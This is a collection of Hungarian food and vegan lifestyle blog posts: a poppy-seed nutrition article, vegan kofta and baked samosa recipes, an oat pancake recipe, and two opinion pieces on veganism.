A mákos ételeknek a magyar konyhában nagy hagyománya van, szerintem mindenki evett már mákos kalácsot, bejglit, rétest, mákos gubát vagy éppen mákos kiflit. Persze a mák (kizárólag a magja) nemcsak egy élelmiszer alapanyag, hanem egyben gyógynövény is. Azt szerintem sokan tudják, hogy a mákolajat csontritkulás megelőzésére ajánlják, valamint a gubójából opiumot állítanak elő. Nos, a mák ennél sokkal többet jelent. Nézzük meg, hogy miért is kerüljön a tányérunkra rendszeresen mák? Mák egyenlő ópium? A mák a boglárkavirágúak rendjébe tartozik, azon belül a mákfélék családjába. (Ide tartozik pl. a pipacs és a vérrehulló fecskefű is). A mák virágzásakor a csészelevelek lehullanak, a magház gubóterméssé képződik, melybe a sok kis mákszem rejtőzik. A mák virágainak a színét tekintve láthatunk fehér, rózsaszínű vagy éppen lila színűeket is. A szentesi fehér mák (tájfajta) hasonló a kék mákhoz, de magtermése szép fehér, és finom dióíze van. A fehér (lilás foltos) virágúaknak magjuk kék színű, tokjuk nagy alkaloidatartalmú. Egy kormányrendelet értelmében ma csak a rózsaszín virágú Ametiszt fajta vethető, más színű fajták termesztését a magasabb alkaloidtartalmuk miatt tiltják. A mák ma már az egész világon elterjedt, őshazája azonban Közép-Ázsia (Törökország, Pakisztán, irán, Kína, India). Elsősorban, mint élelmiszert termesztik, de mellékterméke a mákgubó is rendkívül fontos, mert a gyógyszeripar kiemelkedő alapanyaga. Ez többféle ópiumalkaloidát tartalmaz, melyek közül talán a morfin és a kodein a legismertebb. Hazánkban Kabay János (1896-1936) magyar gyógyszerész felfedezése nyomán (1931) az üres, értéktelen máktokból állíttották elő a morfint és származékait. Ez a találmánya forradalmasította a morfingyártást, s ezáltal a gyógyszergyár még exportra is tudott előállítani ebből az értékes kábító fájdalomcsillapítóból. A XX.században évi sok ezer tonnányi üres mákgubót Tiszavasváriban, a Kabay által létesített Alkaloida Vegyészeti Gyárban dolgozták fel. Még propaganda is épült ennek kapcsán: egyetlen darabja se vesszen felhasználatlanul! Gyűjtéséből az iskolák úttörőcsapatai is kiveszik a részüket. A mák értékes tápanyagai A gubóval ellentétben a mák fogyasztása teljesen ártalmatlan, sőt tápanyagokban gazdag, értékes fehérjéket tartalmaz. A vitaminok közül értékes B1-, B5-, B6-, niacinforrás. Az ásványi anyagok közül pedig nagyobb mennyiségben kálciumot (968 mg/100g), foszfort (800 mg/100g) cinket, mangánt, rezet, vasat (15mg/100g), káliumot és magnéziumot (506 mg/100g) tartalmaz. Ezenkívül értékes telítetlen zsírsavakban, 72% linolsavat (omega-6 zsírsav), 11% olajsavat és palmitinsavat tartalmaz. A mák az erős körmökért, hajért és a csontokért Mivel a mák omega3-6 aránya nem megfelelő, ezért tartós, nagy mennyiségű fogyasztása akár gyulladást is okozhat. Az, hogy a csontritkulás ellen napi 1 evőkanál mákolajat ajánlanak több hónapig vagy akár évekig, ezzel egyáltalán nem értek egyet. Akkor mit tehetünk csontritkulás esetén? Nyugodtan együnk mákot (ne mákolajat) akár heti 3-4x is. Mindig azt mondom, hogy egy ételt tápegészként fogyasszuk, tehát ne vonjunk ki belőle semmit és ne is adjunk hozzá semmit. A mákolaj egy koncentrált étel, melyből kivontuk a rostokat és sok egyéb dolgokat. Amennyiben mégis mákolajat szeretnénk fogyasztani, akkor azt csak kúraszerűen javaslom (2-3 hét, utána ugyanennyi szünet), vagy őrölt szezámmaggal együtt akár naponta is fogyaszthatjuk. 1 evőkanál őrölt szezámmagra 5-6 csepp mákolajat cseppentsünk, valamint naponta fogyasszunk zöld leveleket (zöld turmixot) és algákat. Persze a csontritkulás megelőzésénél nemcsak kalciumra van szükság, hanem sok egyéb más anyag együttállására is (pl. D- és K vitamin, magnézium, foszfor, mangán, stb.) A mákolaj levegővel érintkezve gyorsan avasodik, ezért erre figyeljünk oda, hogy a kupakot jól zárjuk vissza, és tartsuk hűtőben! Egyéb jótékony hatásai A máknak nyugtató hatása van, így az idegrendszerre jótékony hatással bír. Régen a gubóból főztek teát, és ezt itatták a csecsemőkkel, hogy ne sírjanak (így tudtak dolgozni az anyák). Ezt ma már semmiképp ne tegyük meg! Ezenkívül, mint apró magocska a bélfal tisztításában is segítségünkre lehet, kíméletesen kisepri a bélfalra tapadt lerakódásokat. Az olaját használhatjuk bőrápolásra, vagy a magocskákból bőrradír is készülhet. Mákunk van... a konyhában Amennyiben nyersen szeretnénk fogyasztani, akkor ebben az esetben is javaslom az áztatását az enzimgátlók miatt. Ha főzésre, sütésre kerül a sor, akkor ennek már nincs jelentősége. A nyers ételek esetében készíthetünk máktejet, de édességek alapanyaga is lehet. A mákos tészta nyers változata az, amikor répát reszelünk le tésztának, vagy aszalt gyümölcslapot vágunk fel vékony csíkokra. A Kolláth reggeli vagy a kedvenc kásánk alapanyaga is lehet. Reggeli turmixunkba is belekerülhet. Úgyhogy mákra fel, mert nemcsak finom, de egészséges is! Anikó
Indiai kofta - vegán verzió
2014. november 6. Vegán muflon
Az Indiát övező misztériumok közül számomra korántsem a spirituális dolgok a legmegfejthetetlenebbek. Természetesen adódik a kérdés: hogyan képesek egyes jógik eltűnni aktuális helyükről, majd két másodperc múlva kilométerekkel arrébb felbukkanni? És vajon csomagolnak-e maguknak szendvicset az útra? És mint a reinkarnáció hangos hirdetői kétségbe esnek-e, ha azt hallják valamelyik embertársuktól: "holnaptól új életet kezdek"? Ezen kérdések elenyésznek ehhez képest: MI AZ ISTENT SZÍVNAK EZEK, HOGY ILYEN AKCIÓFILMEKET FORGATNAK??? Továbbá a szürrealitásra ennyire fogékony nép hogyan rendelkezhet ennyire tökéletes konyhával? Mert lehet, hogy rettentő mázlista vagyok, de eddig nem volt szerencsém olyan indiai specialitáshoz, amit ne találtam volna iste... pontosabban brahmainak, ganésainak, visnuinak és társainak. (fektetett nyolcas) És ha már itt tartunk, következzék személyes kedvencem, melynek eddig csak vegetáriánus változatát ismertem. Ez utóbbi túrót is tartalmaz, melyet csak igen körülményesen lehet helyettesíteni növényi összetevőkkel. No, de ráleltem a kofta tökéletesen vegán verzióra, mely még finomabb, mint az állati fehérjékkel teletömött. Összetevők: 2-3 db nagyobb krumpli fél fej karfiol 1 kiskanál koriander 4-5 evőkanál liszt 1 csipet(nem több!!!) asafoetida (fokhagymaporral helyettesíthető, abból több is mehet) ízlés szerint őrölt chilipaprika (ezt a fajtát nagyon tudom ajánlani, itthon is kapható) só Az öntethez: 1 (konzerv)doboz hámozott paradicsom (türelmesebbek házilag is elkészíthetik 6-7 paradicsom megfőzésével) 1 kiskanál római kömény vagy garam masala 1 kiskanál őrölt koriander 1/2 kiskanál gyömbér 1/2 kiskanál oregánó 2-3 babérlevél 1 csipet(nem több!!!) asafoetida (fokhagymaporral helyettesíthető, abból több is mehet) őrölt chilipaprika (kapszaicinfüggők itt kedvükre büntethetik magukat) só A megtisztított karfiolt és krumplit lereszeljük az alábbi gitártémára, majd a felesleges vizet a "frötty" hanghatás közepette kinyomkodjuk belőle. Összekeverjük a korianderrel, az asafoetidával (vagy a fokhagymaporral), a chilivel, valamint a liszttel, majd 3-4 centi átmérőjű golyóbisokat formázunk belőle. (Ha túl totymákosnak találjuk, további lisztet adunk hozzá.) Ezeket forró olajban ízlésesen kisütjük. Közben nekiállunk az öntetnek: Kevés olajon megpirítjuk a fűszereket az alábbi sorrendben egymáshoz adagolva: római kömény, chili, asafoetida (vagy fokhagymapor), gyömbér. Ezt egy darabig hevítgetjük, majd hozzáadjuk a paradicsom kb. felét. Pár perc kevergetés után jöhet a másik fele, majd a babérlevelek. Rizsával tálaljuk. A végeredmény annyira tradicionális és finom, hogy Síva vigad a magyar.
Velkám!
2014. október 29. Vegán muflon
"A veganizmus az állati termékek használatának mellőzése, különösen a táplálkozás terén, és a hozzá kapcsolódó filozófia, amely elutasítja az állatok árucikk-státuszát. A veganizmus követőjét vegánnak nevezik." Valahogy így szólna a definíció. (És most zsonglőrködnék egy keveset a kötelező közhelyekkel.) Csakhogy olyan országban élünk, ahol a Jó ebédhez szól a nóta 1960 óta semmit sem vesztett létjogosultságából. Márpedig egy pecsétgyűrűs bojlerszerelő nem áriázhat darumadarakról meg a halott anyjáról grillezett padlizsán szervírozása közben! A magyarnóta olyan, mint Bőrpofa, a texasi láncfűrészes: hús-vér áldozatokat követel. A pörkölt-nokedli kultusz nem csekély számú követői között pedig továbbra is igen nagy a térítő küldetéssel bíró egyedek száma. (Figyelem, saját szubjektív tapasztalat.) Csak ők nem a legfelsőbb erő létezéséről akarnak meggyőzni minket, hanem arról, hogy hülyék vagyunk, amiért bojkottáljuk a szalontüdőt pacalos parasztkajbásszal. A vegetáriánusok/vegánok túlnyomó többsége bizonyára számtalanszor belement már eme parttalan vitákba, és agyalapi szamárköhögésben tör ki az unásig ismert fordulatoktól. Azért szemléltetés gyanánt hadd álljanak itt az ellentábor leggyakoribb kérdései, felvetései ezen sorok lejegyzőjének megfáradt válaszaival: - Tényleg nem eszel húst? - Tényleg. Semmi olyat, ami valaha bőgött, ugatott, hápogott, gágogott, huhogott, brekegett, tátogott, csúszott a földben vagy kánkánt táncolt operettben. És semmi olyat, ami hasonló lényekből származik, különös tekintettel az utolsóként megemlített entitásra. - És halat sem? - (Menten fejedbe húzok egy zsák avas tubifexet!) - És mér nem? Mer él? A répa is élőlény. - Ha szerinted a répának van központi idegrendszere, képes intenzív fizikai és lelki érzelmekre vagy éppen utódokat nemz, akikről aztán szeretően gondoskodik, akkor téged nagyon átvert a biológiatanár. (Egyébként meg szerintem provokálsz, rossz lesz, ha telemegy a füled horgászcsalival.) - De azt tudod, hogy megvakulsz, el fognak sorvadni az izmaid, és a kis petyhüdt mikroszkópikus... hé! ne! mpfffffpffffff!!!!! - (Megmondtam.) Nos, aki szeretne kikezdhetetlen érveket hallani a veganizmus mellett egy nálam türelmesebb egyednél, szánjon egy jó órát a következő videóra. Gary Yourofsky állatvédő aktivista beszél a vágóhidakról, a tej- és tojásiparról, a vegánokhoz köthető hiánybetegségek mítoszáról, az ember ragadozó ösztöneiről, és legfőképpen morális kérdésekről. Tekintettel arra, hogy ez a blog mégis csak gasztronómiai témákat feszeget, az Earthlings c. horror-dokumentumfilm beágyazásától eltekintenék. (Legvégül: a blog címe számtalan átvirrasztott éjszaka eredményeképp született meg, de ez reményeim szerint érződik is rajta. Frank Drebin hadnagyot idézve: "és most harapjunk valamit!")
Máltai Qassatat vagy indiai Szamósza?
2014. október 18. Zöld Avocado
Aki ismer tudja, hogy imádunk utazni, új kultúrákat megismerni, és természetesen az adott ország ételeit kóstolgatni, és ami megtetszik, azt integrálni a saját konyhámba. ;-) A múlt héten volt szerencsénk a napsütéses Máltán tölteni pár napot, ahol kipróbáltunk pár helyi ételt is. Ilyen volt a számunkra vicces névvel ellátott Pastizzi is, melyeket úgynevezett Pastizzériákban árulnak. :-D Ezek kis pékségszerű üzletek, ahol főként kelt tésztákat, és rétesszerű harapnivalókat árulnak ezer féle-fajta töltelékkel. A Pastizzi is egy ilyen rétes tésztához hasonló tésztából készült kis kagylócska, megtöltve sós és édes töltelékekkel. Akit érdekel, hogy hogyan készül egy ilyen máltai pastizzi, itt a link, amin megnézheti a profikat sütés közben: How to make the perfect Pastizzi? kéksajtos-karfiolos szamószaKorábban dolgoztam együtt indiaiakkal, akiknek szintén elég színvonalas, a szám ízéhez közel álló gasztronómiájuk van. Szerencsémre mindig kaptam kóstolót a házi kosztból, és többször is elvittek minket indiai éttermekbe céges vacsikra, ahol beavattak a gasztronómiájuk rejtelmeibe, és nem csak találomra választottunk a menüről a sok idegen étel név közül, mint ahogy azt egy átlag európai tenné. ;-) Hogy hogyan lesz ebből a két sztoriból egy recept? Hát nagyon egyszerűen! :-) Máltán ettünk Qassatat, ami a Pastipizzi után a legnépszerűbb harapnivaló. Kóstoltunk ricottával töltött vulkán alakú, és zöldborsó pürével töltött kagyló formájú változatot is. Nekem egyből beugrott róla az indiai szamósza, mert szerintem elég hasonló az alap gondolat, és a zöldborsós Qassatat kagyló formájú volt, mint a szamószák általában. Nemrégiben már készítettem itthon reform szamószát. Most pedig a máltai élménynek köszönhetően, el is határoztam, hogy ez lesz a következő recept a blogon. Tehát hoztam nektek reform indiai Szamószát, ami nagyban hasonlít a máltai Qassatat-hoz, és közben eltér mindkettőtől. :-D (Sajnos nem tudok szép és gusztusos képekkel szolgálni, de amint újra elkészítem őket, teszek fel szebb képeket ide a blogra.) Hogy mitől reform? A liszt használattól, és attól, hogy nem olajban van kisütve, mint a hagyományos szamósza, hanem sütőben. Ettől szárazabb, de egészségesebb, könnyebben emészthető ételt kapunk. A töltelék pedig ezer féle lehet, kreativitásunktól függően. Én egy kéksajtos-karfiolos, és egy brokkolis-burgonyás változatot hoztam most nektek. ;-) KÉKSAJTOS-KARFIOLOS ÉS BROKKOLIS-BURGONYÁS SZAMÓSZA brokkolis-burgonyás szamósza HOZZÁVALÓK: Reform szamósza tésztához (kb.18 db 12 cm átmérőjű kagylóhoz):200 g glutén mentes liszt (vagy kukorica liszt)200 g teljes kiőrlésű tönköly liszt50 g jó minőségű növényi margarinHimalája só2 dl víz1/2 tk szódabikarbónatojás sárga a kenéshez (kivéve ha vegán ételt szeretnénk) Kéksajtos-karfiolos töltelékhez:1 kisebb fej karfiol1 doboz Ricotta sajt10 dkg kéksajt / márvány sajtHimalája só, frissen őrölt fekete bors, oregánó(1 evőkanál sörélesztő pehely) Brokkolis-burgonyás töltelékhez:1 kisebb fej brokkoli1 közepes fej vöröshagymaHimalája só, frissen őrölt fekete bors, majoránna, friss bazsalikom, fokhagyma (ízlés szerinti fűszerek)4 kisebb burgonya kéksajtos-karfiolos szamósza ELKÉSZÍTÉS: A tészta hozzávalóit összegyúrjuk, és lefedve félre tesszük pihenni egy órára. Lehetőleg nap sütötte helyre. (Nem árt neki, ha egy kicsit megkel.) Közben megpároljuk a karfiolt, és a brokkolit, miután rózsákra szedtük őket. (A legjobb erre egy emeletes pároló edény. Hamar elkészül, és tényleg párolódik, nem pedig fő, így megtartja értékes tápanyagait.) Miután megpuhultak, fakanállal apróra cafatokra vagdossuk őket. Amíg meleg, addig könnyű. ;-) Egy tálban kikeverjük a Ricottát, és a kéksajtot. Hozzá keverjük a megpárolt karfiol cafatokat, és ízlés szerint fűszerezzük. A kék sajt elég sós, és markáns ízű, így sok extra fűszer nem kell bele. Egy másik tálban összekeverjük a már előre megdinsztelt vöröshagymát, a megpárolt brokkoli cafatokat, és az előre megfőzött krumplikat felkockázva. Fűszerezzük sóval, borssal, majoránnával, fokhagymával, friss bazsalikommal, vagy amivel éppen szeretnénk. A megpihent tésztát (ami egy ruganyos tészta) kettéválasztjuk, majd kinyújtjuk a két golyót. Vékonyra, kb.fél cm vastagságúra nyújtjuk a tésztát. Elővesszük a kagyló formájú szaggatónkat, és a hátsó felével köröket szaggatunk. (Az én kagyló formám átmérője 12cm.) Egy ilyen kör alakú tésztát beleteszünk a kinyitott kagyló formába, majd egy evőkanálnyi tölteléket (brokkolis vagy karfiolos) helyezünk a kagyló egyik felébe. Kagylót összecsukjuk, és összenyomkodjuk a széleit, hogy ne jöjjön ki belőle a töltelék, Vigyázzunk, lehetőleg ne szakadjon ki a tészta! (Aki nem akar a kagylókkal bajlódni, az egyszerűen vagdossa be a kinyújtott tésztát négyzet alakokra, amikből megtöltve aztán kis batyukat tud hajtogatni. Úgy, mint a túrós batyuknál: batyu hajtogatás kagylók helyett Miután az összes tészta elfogyott, és a kagylók megtöltve sorakoznak, mehetnek a sütőbe. Lekenjük a tetejüket felvert tojás sárgával, hogy ne száradjon ki nagyon a tészta. 180 fokra előmelegített sütőben, kb.25 perc alatt készre sütjük a szamószákat. ;-) brokkolis-burgonyás szamósza snidlinges mártogatóssal Megjegyzés1: Az eredeti indiai szamószát bő forró olajban sütik ki, így ropogós, zsíros szamószákat kapnak. Én azonban nem vagyok híve az olajban tocsogó ételeknek, így az enyém a sütőben készült. A tészta nem szárad ki, így önmagában is fogyasztható. Ha valakinek túl száraz lenne ez a verzió, egy kevés jégsalátával tálalhatja a kagylókat, vagy készíthet mellé snidlinges, fokhagymás, tejfölös mártogatóst. Balázs kedvence ez a mártogatós, így nálam ez is készült hozzá. (A brokkolishoz el tudok képzelni még akár paradicsomos, bazsalikomos, fokhagymás mártogatóst is.) Megjegyzés2: Ha marad egy kis töltelék pluszba, piritósra kenve is finom. ;-) Megjegyzés3: Aki szereti a keleti fűszereket, az használhat chilit, kurkumát, sáfrányt a töltelékek ízesítésére. Megjegyzés4: A magyaros ízek kedvelőinek ajánlom a szalonnás-kukoricás-tejfölös-hagymás keveréket tölteléknek. De utána senki ne reklamáljon a felszökött kilókért! ;-)
Vegán önvédelem?
2014. október 17. Vegan Spirit
Az elmúlt napokban történt pár dolog, a facebook legnagyobb hazai vegán csoportjában, a Vegan in Hungary-ben, ami arra sarkallt, hogy leírjam a gondolataimat a veganizmus-erőszak-erőszakmentesség édes hármasáról, melybe oly gyakran gabalyodom bele én magam is. Jelen posztommal nem kívánok pálcát törni az események egyik érintettje felett sem, jóllehet az én profilom is letiltásra került. Arra viszont tökéletes példát nyújt a jelen helyzet, hogy kifejtsem a véleményem a fent említett 3 fogalom bonyolult kapcsolatáról, de kezdjük az elején... ...Történ ugyanis, hogy az egyik csoporttag egy megdöbbentő posztot tolt fel a Vegan in Hungary-be, miszerint az egyik, magát nevében is vegánnak nevező életmód tanácsadó, olyan kijelentéseket tett, melyek megkérdőjelezik hitelességét. A szóbanforgó személy szerint viszont nem történt ilyen kijelentés. Nos, mivel a célom nem a konkrét eset igazságának felkutatása, ezért nem megyek bele a részletekbe, csak elméleti síkon folytatnám a boncolgatást. Ha azt látod, hogy az oroszlán harapja a bivalyt, tudhatod, hogy a bivaly nem védekezik, és hamarosan elpusztul. Ha azt látod, hogy a bivaly felöklelte az oroszlánt, tudhatod, hogy a bivaly védekezik, de mindkét esetben az oroszlán a támadó és a bivaly az áldozat. Még ha az oroszlán meg is sérül, és ha megsajnálod is miatta, akkor is ő támadta meg a bivalyt, a bivaly csak védekezett! Amiről beszélni szeretnék az az, hogy hogyan/mit tegyünk, ha valaki történetesen vegánként hirdeti magát és szolgáltatásait, de kiderül róla, hogy mondjuk a veganizmusnak csak egy részét tartja fontosnak, vagy, hogy egyáltalán nem a veganizmus elvei alapján éli az életét? Először is, ha van időnk, olvassuk el a veganizmus rövid történetét, hogy megértsük a veganizmus célját. Ha nincs időnk, akkor itt a lényeg: " A Vegán Társaság célja az, hogy véget vessen az állatok emberi kizsákmányolásának. A veganizmus, ennek megfelelően, azt az alapelvet jelenti, hogy az embernek az állatok kizsákmányolása nélkül kellene élnie. A Társaság ezennel elkötelezi magát a kitűzött cél teljesítésére, vagyis arra, hogy megszüntesse az állathasználatot; ideértve az állatok élelmezési célú használatát, az állatok dolgoztatását, a vadászatot, az állatokon való kísérletezést, illetve az állati életet kizsákmányoló minden más emberi tevékenységet." Másodszor meg kell értenünk a veganizmus elvei mentén használható eszközöket. Ez nem olyan nehéz, legalábis első ránézésre. Kövekeztetni tudunk egyrészt abból az elvből, hogy minden állattal szembeni erőszak, elnyomás és kihasználás eltörlését tűzi ki célul a veganizmus. Másrészt abból a megfogalmazásból, hogy az embert is az állatvilág részeként említi/kezeli, tehát az erőszak, elnyomás és kihasználás megszüntetésének célja az emberi társadalomra is érvényes, ám nem kiemelt a több tízmilliárd, évente lemészárolt állathoz képest. Már csak azért sem, mert az emberi társadalomban lévő elnyomás és erőszak nagyrészt megszüntethető volna pusztán azáltal, hogy felhagyunk a nálunk gyengébbek, és a nekünk kiszolgáltatottak kizsákmányolásával. Illetve az emberek közötti erőszak és elnyomás felszámolását már számtalan mozgalom a kezébe vette, mint az abolicionisták, a feministák, Mahatma Gandhi, Martin Luhter King, Nelson Mandela vagy Rosa Sparks. Tehát kijelenthetjük, hogy a veganizmus, céljai eléréséhez, csak olyan eszközöket használhat fel, melyek a mozgalom elveivel megegyeznek, vagyis nem szülnek elnyomást, erőszakot, nem épülnek kizsákmányolásra, és nem teszik lehetővé mások kihasználását! Mit is tehetünk hát, ha van egy csaló, aki vegán színekben tetszeleg. de nem felel meg a vegán elveknek? Nem alkalmazhatunk erőszakot? Ez a szó hétköznapi értelmében igaz, azonban az önvédelem joga megillet minket is! Az önvédelem pedig nagyon ritkán valósítható meg kéréssel, kedves szavakkal, mosolygással, vagy öleléssel. Éppen úgy, ahogy az utcán megvédeném magam, vagy a mást, ha rá támadna valaki, vagy ahogy a szervezetem immunrendszere védi a testemet, ugyan úgy a vegán közösségnek is meg van a joga az önvédelemre, ha támadás éri. Mint minden közösségnek, kell hogy legyen egy védekező mechanizmusa, ami kiszűri és hatástalanítja a közösséget veszélyeztető dolgokat. Egy olyan világban, ahol évente 55 milliárd ártatlant végeznek ki, azt gondolni, hogy nincs szükség önvédelemre, elképesztő naívság. Az önvédelem nem lehetőség, nem választható opció, hanem felelősségteljes kötelesség! Hiszen mi lenne, ha mindenféle csaló és hazug ember, a veganizmus látszata mögé bújva akarna meggazdagodni, és mi ezt hagynánk? Ebben az esetben mi sértenénk meg leginkább az elveinket! 1. Mert ebben az esetben a megtévesztett emberek tömege válna kihasználás áldozatává! 2. Ugyanúgy a veganizmus is a kihasználás áldozatául esne, hiszen hasznot húznának belőle! 3. A vegán mozgalom egy ilyen helyzetben nem csak kihasználás áldozata lenne, de amint fény derülne a csalók űzelmeire, úgy a mozgalom is elhalna az emberek bizalmával párhuzamosan. Gyakorlatilag a hitelesség jelenti a mozgalom életét! Éppen ezért a legfontosabb, hogy a mozgalom hitelességét megőrizzük, és ehhez az önvédelem elegendő ezközt biztosít. Ha valaki állattenyésztő, húsevő, vagy állati termékeket használ, de közben vegánként hirdeti magát, és mindezt ráadásul pénzért teszi, az teljesen hiteltelen, és az ilyen személyt a közösségnek kötelessége megkérni, hogy fejezze be tevékenységét, vagy amennyiben tevékenységét nem hajlandó abbahagyni, úgy nevéből hagyja el a vegán jelzőt! Az ilyen személy nem nevezhető vegánnak, hiszen nem felel meg a világosan megfogalmazott elveknek! Innentől fogva kötelességünk kimondani az ilyen szeméyről, hogy nem vegán! Az igazság kimondása pedig sohasem erőszak, bár nyilvánvalóan nagyon kellemetlen lehet annak, akire vonatkozik. Ha valaki nem érti meg, miért próbál tőle elhatárolódni a közösség, és a magyarázatokat támadásként kezeli, az nem változtat a csalás tényén, és a hitelességünk megőrzésének szükségességén. Mivel egy ilyen csaló személy önmaga tetteinek következményével kerül szembe, nem pedig a vegán mozgalom által ráerőltetett helyzettel, ezért minden a helyzettel járó kellemetlenség önmagától származik. Ezekért a kellemetlenségekért a vegán mozgalmat erőszakosnak, kirekesztőnek beálítani olyan, mint rosszindulattal vádolni a rendőrt, aki elfog egy tolvajt. A támadás és védekezés között a különbség az, hogy mindig a támadó teszi meg az első lépést, és akit megtámadtak, visszatámadni ugyan tud, de az már önvédelem! Ne felejtsük tehát el, hogy aki hamisan vegánnak állítja be magát, és ezzel a vegán mozgalom hitelességét és létezését veszélyezteti, az bizony már megtete az első lépést, és a mozgalomnak csak a védekezés marad, amit meg is kell tennie, ha nem akar egy hitelét vesztett, nevetséges tévútként bekerülni a történekemkönyvekbe! Végül azt is fel kell ismernünk, hogy amint a támadást megvalósító tény megszűnik, úgy a további önvédelem feleslegessé válik, ezért ilyenkor meg kell köszönni a támadónak a viszavonulást, és fel kell hagyni a további önvédelemmel! Frissítés: Természetesen meg kell említsük, hogy az önvédelemnek tárgyilagosnak kell lennie. Nem csaphat át személyeskedésbe, vagy nem térhet el más módon a tárgytól, mert az már kilép az önvédelem határain túlra! Minden vegán érvelésnek olyannak kell lenni, amit Pl Mahatma Gandhi-tól láthattunk. Tisztán és érthetően meg kell fogalmazni a problémát és a megoldást, mindezt úgy, hogy ne akarjuk sértegetni, bántani az érintetteket. Éppen úgy, ahogy nem személyeskedhetünk senkivel, mert az az értelmi kommunikáció végét jelenti. Nem szabad a személyek felett pálcát törni, ha a tetteik azok, amik nem megfelelőek. Nem ítélhetjük el a másként táplálkozókat, ahogy ugyanezt joggal várjuk el mi is a többségtől. Viszont elmondhatjuk mondjuk hogy a húsevés, a hozzá kapcsolódó halálipar miatt sem emberhez, sem álathoz nem méltó. Megkérhetjük őket, hogy hagyjanak fel ezzel a szokással, és érvelhetünk a húsfogyasztás hatásaival. Példálózhatunk a veganizmus hatásaival is, de nem mondhatjuk, hogy "Már a fejeden látszik, hogy értelmileg egy szinten vagy egy kanna benzinnel" vagy hogy "nem tudom mit vártam egy ilyen zsíros hajú, púpos hátú agymosott zombitól!" Ez már nem érvelés, nem kérés, és nem önvédelem. Ez pusztán megalázás, ami elveiben szintén nem vegán, ezért miden ilyen kinyilatkozástól tartózkodni kell! Természetesen nagyon sokat segítene egy ilyen kérdéses szituációban egy egységes és hivatalosan bejegyzett Magyar Vegán Társaság, mely alkalomadtán hivatalosan is felkérhetné a problémás esetek érnitetjeit, a helyzet megoldására, vagy végső esetben megvonhatná a vegán jelzőt, esetleg jogi úton is feléphetne a visszaélőkkel, lejáratókkal szemben. Öszegezve a fenti eszmefuttatást, véleményem szerint, ha valaki vegánként pozícionálja és adja el magát, és szolgáltatásait, miközben nem vegán, akkor meg kell kérni, hogy váljon vegánná, vagy fejezze be tevékenységét, vagy amennyiben tevékenységét nem hajlandó abbahagyni, úgy nevéből hagyja el a vegán jelzőt! J. K. Valentine
Palacsinta kicsit másként: túrós kakaós zabpalacsinta
Ki ne szeretné a palacsintát? Főleg a túrósat? Én is egy rajongó vagyok, ha arról van szó, hogy enni kell. Amióta azonban megkóstoltam ezt az egészségesebb verziót, csakis ezt készítem, ha túrós palacsintára fáj a fogunk. Ez a palacsinta Isteni finom! :-) A hagyományos palacsinta is idő igényes, és ez ezzel a reform palcsintával sincs másként. Viszont sokkal kevesebb mennyiséggel is jól lehet lakni, látványos (színeiben hasonlít a túrórudihoz), nem szennyezzük a testünket vele, úgy, mint a hagyományos palacsintákkal, könnyebben emészthető a magas rosttartalmának köszönhetően (zab), és irtó finom! ;-) túrós kakaós zabpalacsinta A zab, az egyik leghasznosabb tápanyagtartalommal bír a gabonák közül, megfizethető áron van, és lassú felszvódása miatt a zabból készült ételek sokkal hosszabb ideig okoznak jóllakottság érzést, mint az egyéb gabonák pl.: búza. Magyarországon nem éppen elterjedt gabona fajta manapság, de nem volt ez mindíg így. A régebbi korokban előszeretettel fogyasztották pl.: a zabkását, amit a szegények ételének tartottak. Olcsó volt, rengeteg energiát adott, és sokáig laktató, így jól bírták az egész napos fizikai munkát is vele a földeken, vagy akár a harc téren. A zab magas fehérjetartalommal, gyomorbarát gyulladásgátló anyagokkal, magas B és E vitaminnal bír. Gazdag vas, kálium, kálcium, magnézium és foszfor forrás. Rendszeres fogyasztása igen jó hatással van az egészségünk megőrzésére, mivel javíthatja az emésztést, a csontok illetve az erek általános állapotát. Itt Írországban, és talán már más országban is újra előtérbe kerül ez az értékes gabona, és újra egyre többen fogyasztják jótékony hatásai miatt. Mi is köztük vagyunk! :-) Hozzávalók: (kb.2 főnek) A tésztához: - 150 g teljes kiőrlésű, nagy szemű zabpehely - 1 dl növényi tej (mandula, vagy mogyoró, vagy kókusz) - 3,5 dl víz - 20 g keserű, sovány kakaópor, vagy karob por - 2 ek Agave szirup (vagy Xilit, vagy Demerara cukor) - csipet Himalája só - késhegynyi szódabikarbóna A túrókrémhez: - 250 g sovány túró - 1/2 citrom leve - 1/2 citrom reszelt héja (lehetőleg vegyszermentes) - tetszőleges édesítőszer ízlés szerinti mennyisége - vanília kikapart magja (vagy Vanília extract, kivonat) - 1/2 dl növényi tej (mandula, vagy mogyoró, vagy kókusz) Elkészítés: A tészta hozzávalóit keverjük össze, majd hagyjuk állni, hogy a zabpehely kellően átázhasson. Ez minimum 30 perc, de ha úgy tetszik, egy éjszakára is beáztathatjuk (ez esetben tegyük hűtőbe). Mindezek után kézi mixerrel vagy turmixgéppel pépesítjük. Felforrósított teflon serpenyőben sütjük. A sikeres sütés titka, hogy egy kissé előcsalogassuk magunkból a tűzhely DJ-t, és bőszen csavargassuk a gombokat. A serpenyő legyen tűzforró, amikor beleöntjük a tésztát, és szétterítjük. Azonban a zabpalacsinta nem szeret nagy lángon sülni, így amikor folyamatban van a sütés, vegyük alacsonyabbra a hőfokot. Az egyik oldalának 3-4-szer annyi idő kell, mint a másiknak megfordítás után. (Vigyázat, amíg nem sül meg az egyik oldala, nehezen forgatható, könnyen törik,ha ezt észleljük, legyünk türelemmel, várjunk még egy keveset!) Végül tányérra csúsztatjuk. (Ha hibátlan a teflonbevonat a serpenyőn, nem szükséges zsiradékot használni, Ha mégis, akkor használj kókuszzsírt!) A túrókrém elkészítéséhez a hozzávalókat keverjük össze, és hűtsük le. És ezzel a krém el is készült. :-) (Én kézi botmixerrel ezt is krémes állagúvá varázsoltam.) Az elkészült és kihűlt palacsintákat többféle formában tálalhatjuk. Az eredeti recept szerint kenjük meg a krémmel a palacsintákat, és göngyöljük fel a hagyományos módon. Így lesz belőle túrórudi palacsinta. ( http://fittipaldii.blogspot.ie/2013/10/turo-rudi-zabpalacsinta.html) Túrórudi zabpalacsinta a kép erről a webhelyről származik: http://fittipaldii.blogspot.ie/2013/10/turo-rudi-zabpalacsinta.htmlÉn inkább palacsinta tortát készítettem belőle, és egymásra pakoltam a palacsintákat, köztük a krémmel. túrós kakaós zabpalacsinta torta Előfordult, hogy egy karácsonyi vacsora alkalmával mutatós kis tornyokat építettem belőlük. Na ez tényleg nagyon időigényes, de jól néz ki! :-) Virág formájú linzer szaggatókkal kiszaggattam a készre sült palacsintát. Nagy virág alulra, és egyre kisebb virág rá, majd még kisebb a tetejére. Közé pedig mehet a túrós krém. Karácsonykor egy kicsit a havas fenyőfákra emlékeztetnek a formák...talán... Bár jó képzelő 